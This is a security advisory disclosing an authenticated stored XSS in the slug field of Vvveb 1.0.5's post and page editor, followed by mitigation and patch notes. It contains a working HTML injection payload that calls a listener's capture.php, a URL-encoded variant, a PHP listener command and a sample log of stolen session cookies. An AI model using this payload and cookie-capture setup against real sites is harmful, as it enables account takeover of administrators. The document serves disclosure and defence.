Vvveb 1.0.5 | Authenticated Stored XSS on creating posts & pages

Basic Information

Software Type Web App
Software Name Vvveb
Affected Version 1.0.5
Software Vendor Vvveb
Software Link https://github.com/givanz/Vvveb
Severity High
CVSS Score 8.0
Affected Assets 100+
Date of Discovery Jan 3rd, 2025

Description

The endpoint at [/vadmin123/index.php?module=content/post&type=post] and [/vadmin123/index.php?module=content/posts&type=page] is vulnerable to XSS, an attacker can trigger XSS by injecting malicious code into slug parameter.
The payload can be triggered by editing the post/page or by using drag and drop designer.

Both endpoints are accessible by an editor and can be used to inject malicious XSS to steal cookies of other site admins, editors or even super admins.

Reproduce

To reproduce the issue, navigate to any of these endpoints to view posts or pages:
http://127.0.0.1/vadmin123/index.php?module=content/posts&type=post
http://127.0.0.1/vadmin123/index.php?module=content/posts&type=page

Edit a post or a page (both are very similar):
http://127.0.0.1/vadmin123/index.php?module=content/post&post_id=6&type=post
http://127.0.0.1/vadmin123/index.php?module=content/post&post_id=14&type=page


Insert the following payload in slug and save the page:

"><img src='http://127.0.0.1:1718/capture.php'>
Once the page reloads, the code will be executed. Additionally, this can be triggered if other moderators/admins were to click on the post, clicking the post/page directly opens it in edit mode:
http://127.0.0.1/vadmin123/index.php?module=content/post&post_id=6&type=post


It can also be triggered if you open the post using drag and drop editor:
http://127.0.0.1/vadmin123/?module=editor/editor&name=Mauris+viverra+cursus+ante+laoreet+eleifend&url=//127.0.0.1/%22%3E%3Cimg%20src=%27http://127.0.0.1:1718/capture.php%27%3E&template=content/post.html


Additionally, it can be triggered if you just open endpoint in drag and drop editor just by its name:
http://127.0.0.1/vadmin123/?module=editor/editor&name=Mauris+viverra+cursus+ante+laoreet+eleifend
This is useful because it doesn't show the payload but executes it anyway.

Cookie stealing
To steal cookies, I created the following php script:
https://gist.github.com/0xHamy/b2674eeffd1f73af96d29f152c47bcbd


Save this into a capture.php file and then start php start with the following command:
> php -S 0.0.0.0:1718

This saves cookies to a file named cookie_log.txt, cookies are saved with a timstamp:
[2025-01-03 18:09:17] Cookies: _ga_90PNJH7CQ5=GS1.1.1735826854.1.1.1735826858.0.0.0; _ga=GA1.1.305814098.1735826855; PHPSESSID=EzuO8BB8K7BLfydEIx%2C1De1mJA3ONYvZBOIhjeXt-syZFn0%2C; user=1

Cookies can later be used to access admin or another site moderator's account.

Proof of Concept (PoC) Video

PoC Exploit

https://gist.github.com/0xHamy/b2674eeffd1f73af96d29f152c47bcbd

Mitigation

Add whitelisting filters and escape characters.

Patch

Vvveb added escape (htmlspecialchars) for all content fields like slug/name for posts and pages on post/page edit and on editor page file manager list.



Posted on: January 10, 2025 10:36 PM